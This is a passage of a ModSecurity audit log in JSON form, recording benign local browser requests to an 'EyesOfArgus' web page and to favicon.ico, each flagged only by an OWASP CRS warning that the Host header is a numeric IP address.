{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCQAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc7Dn8AAQEAABwQSCQAAAAD\"]"],"stopwatch":{"p1":385,"p2":850,"p3":43,"p4":236,"p5":46,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCUAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc7Dn8AAQEAABwQSCUAAAAD\"]"],"stopwatch":{"p1":384,"p2":847,"p3":43,"p4":307,"p5":46,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:59:08 --0400","transaction_id":"WRc7XH8AAQEAABwRiHwAAAAE","remote_address":"127.0.0.1","remote_port":43582,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:57:46 GMT","If-None-Match":"\"ccc-54f6ab8a0710a-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc7XH8AAQEAABwRiHwAAAAE\"]"],"stopwatch":{"p1":605,"p2":992,"p3":82,"p4":362,"p5":51,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:59:08 --0400","transaction_id":"WRc7XH8AAQEAABwRiH0AAAAE","remote_address":"127.0.0.1","remote_port":43582,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:57:47 GMT","If-None-Match":"\"295-54f6ab8b53192\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:08 GMT","ETag":"W/\"295-54f6abd8205b9\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc7XH8AAQEAABwRiH0AAAAE\"]"],"stopwatch":{"p1":629,"p2":1353,"p3":83,"p4":192,"p5":77,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1kAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc8tn8AAQEAABzhe1kAAAAF\"]"],"stopwatch":{"p1":614,"p2":1044,"p3":58,"p4":319,"p5":63,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1oAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:04:50 GMT","ETag":"\"107-54f6ad1e5f7e6\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc8tn8AAQEAABzhe1oAAAAF\"]"],"stopwatch":{"p1":386,"p2":932,"p3":57,"p4":212,"p5":56,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1sAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc8tn8AAQEAABzhe1sAAAAF\"]"],"stopwatch":{"p1":596,"p2":1217,"p3":66,"p4":441,"p5":69,"sr":24,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1wAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc8tn8AAQEAABzhe1wAAAAF\"]"],"stopwatch":{"p1":620,"p2":1457,"p3":95,"p4":424,"p5":131,"sr":32,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:16 --0400","transaction_id":"WRc9RH8AAQEAABwOGoMAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc9RH8AAQEAABwOGoMAAAAB\"]"],"stopwatch":{"p1":580,"p2":1220,"p3":88,"p4":482,"p5":90,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:16 --0400","transaction_id":"WRc9RH8AAQEAABwOGoQAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:07:12 GMT","ETag":"\"107-54f6ada649b21\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag 